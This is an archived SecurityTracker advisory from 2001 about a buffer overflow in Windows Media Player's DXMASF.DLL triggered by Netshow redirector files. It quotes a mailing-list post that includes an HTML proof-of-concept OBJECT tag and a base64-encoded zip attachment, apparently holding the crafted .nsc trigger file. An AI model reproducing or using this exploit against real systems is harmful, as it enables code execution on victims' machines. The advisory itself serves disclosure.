SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Windows Media Player Vendors:   Microsoft
(Another ASX Vulnerability) Re: Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
SecurityTracker Alert ID:  1001628
SecurityTracker URL:  http://securitytracker.com/id/1001628
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 29 2001
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 6.4, possibly others
Description:   It is reported that the Windows Media Player contains a vulnerability in its processing of certain ASX tags that allows a remote user to cause the Media Player client to execute arbitrary code on the client's host.

A user reports another buffer overflow in DXMASF.DLL. This vulnerability is with Netshow multicast redirector files.

<HTML>
<BODY>
<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95

type="application/x-oleobject">
<PARAM NAME="Filename" VALUE="ipaddr.nsc">
</OBJECT>
</BODY>
</HTML>

The user warns that the above code will cause Explorer to crash ("beware: IE crashes too so your windows get lost").

Impact:   A remote user can cause the Media Player to execute arbitrary code on the Media Player's host.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
May 2 2001 Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System



 Source Message Contents

Subject:  Microsoft Windows Media Player Buffer Overflow Vulnerability


------=_NextPart_000_61b4_454_32ae
Content-Type: text/plain; format=flowed

The same old story again, this time with Netshow multicast redirector files. 
Check out the attachment.
Open the .html. Your EIP gets busted. (beware: IE
crashes too so your windows get lost)

There is a whole lot of these in dxmasf.dll. This is
just too fun to post them one at the time. Many more
known right now. Heck, is it my or their duty to find
and fix them all?-)

I dunno but I guess the patch they published on 23th
was for the bug I found a while ago. If so, I would
dare to disagree with the technical details of the
bulletin. If dxmasf.dll is the same version, one
wouldn't need to differentiate between operating
systems when writing an exploit.

_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

------=_NextPart_000_61b4_454_32ae
Content-Type: application/x-zip-compressed; name="ipaddr.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="ipaddr.zip"

UEsDBBQAAgAIAHhyrSpEIuE7wgQAAMwMAAAKAAAAaXBhZGRyLm5zYy3NSW4j
RhKG0b0B36GPoIjIoWrRC5ISJ4mDJA5FGr1zX8C+P+DXQCfwIfHH5v2x+PPP
v/7799//+f233flf/x//Xry8vCy10qvetNZGW+2017s+dNBRJ531qS9966Kr
brpr6qGnFi/BCU5wghOc4AQnOMEJTnCCE5zgBCc4wQlOcIITnOAEJzjBCU5y
kpOc5CQnOclJTnKSk5zkJCc5yUlOcpKTnOQkJznJSU5yklOc4hSnOMUpTnGK
U5ziFKc4xSlOcYpTnOIUpzjFKU5xilOc4jRO4zRO4zRO4zRO4zRO4zRO4zRO
4zRO4zRO4zRO4zRO4zRO4zRO43RO53RO53RO53RO53RO53RO53RO53RO53RO
53RO53RO53RO53RO5wzO4AzO4AzO4AzO4AzO4AzO4AzO4AzO4AzO4AzO4AzO
4AzO4AzO4EzO5EzO5EzO5EzO5EzO5EzO5EzO5EzO5EzO5EzO5EzO5MyXH3ro
qYW11EqvetNaG221017v+tBBR5101qe+9K2Lrrrprp966KmFtdRKr3rTWhtt
tdNe7/rQQUeddNanvvSti6666a5feuipRbzEUiu96k1rbbTVTnu960MHHXXS
WZ/60rcuWng3/11TDz3/d4/gBCc4wQlOcIITnOAEJzjBCU5wghOc4AQnOBFX
3XTX1ENPLSI5yUlOcpKTnOQkJznJSU5ykpOc5CQnOclJTnKSk5zkJCc5ySlO
cYpTnOIUpzjFKU5xilOc4hSnOMUpTnGKU5ziFKc4xSlOcRqncRqncRqncRqn
cRqncRqncRqncRqncRqncRqncRqncRqncRqncTqnczqnczqnczqnczqnczqn
czqnczqnczqnczqnczqnczqnczqncwZncAZncAZncAZncAZncAZncAZncAZn
cAZncAZncAZncAZncAZncCZnciZnciZnciZnciZnciZnciZnciZnciZnciZn
ciZncmb80ENPLaylVnrVm9baaKud9nrXhw466qSzPvWlb1101U13/dRDTy2s
pVZ61ZvW2mirnfZ614cOOuqksz71pW9ddNVNd/3SQ08t8iWXWulVb1pro612
2utdHzroqJPO+tSXvnXRVTfdNfXQU4sMTnCCE5zgBCc4wQlOcIITnOAEJzjB
CU5wghOc4AQnOMEJTnCSk5zkJCc5yUlOcpKTnOQkJznJSU5ykpOc5CQnOclJ
TnKSk5ziFKc4xSlOcYpTnOIUpzjFKU5xilOc4hSnOMUpTnGKU5ziFKdxGqdx
GqdxGqdxGqdxGqdxGqdxGqdxGqdxGqdxGqdxGqdxGqdxGqdzOqdzOqdzOqdz
OqdzOqdzOqdzOqdzOqdzOqdzOqdzOqdzOqdzOmdwBmdwBmdwBmdwBmdwBmdw
BmdwBmdwBmdwBmdwBmdwBmdwBmdwBmdyJmdyJmdyJmdyJmdyJmdyJmdyJmdy
JmdyJmdyJmdyJmfmDz301MJaaqVXvWmtjbbaaa93feigo04661Nf+tZFV910
10899NTCWmqlV71prY222mmvd33ooKNOOutTX/rWRVfddNcvPfTUol5qqZVe
9aa1Ntpqp73e9aGDjjrprE996VsXXXXTXVMPPbWo4AQnOMEJjpv3+2//AFBL
AwQUAAIACAD5GbsqHzgeHKQAAAC6AAAACwAAAGlwYWRkci5odG1ss/EI8fWx
4+WycfJ3iQTR/k5ers4hCsk5icXFmSm2zj7Bni5WRkYpZmnGhka6SQZpZrqG
hikGupYmiUm6BgYWBsnmJsnmqZamvFycJZUFqbZKiQUFOZnJiSWZ+Xn6Fbr5
Oan5SVmpySVKQNMVgIDTJsAxyNFXwc/R19VWyS0zJzUvMTdVSSHM0ScUKJBZ
kJiSUqSXV5wM0mCjD3EPmAlzoj7YzQBQSwECFAAUAAIACAB4cq0qRCLhO8IE
AADMDAAACgAAAAAAAAABACAAwIEAAAAAaXBhZGRyLm5zY1BLAQIUABQAAgAI
APkZuyofOB4cpAAAALoAAAALAAAAAAAAAAEAIADAgeoEAABpcGFkZHIuaHRt
bFBLBQYAAAAAAgACAHEAAAC3BQAAAAA=


------=_NextPart_000_61b4_454_32ae--


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC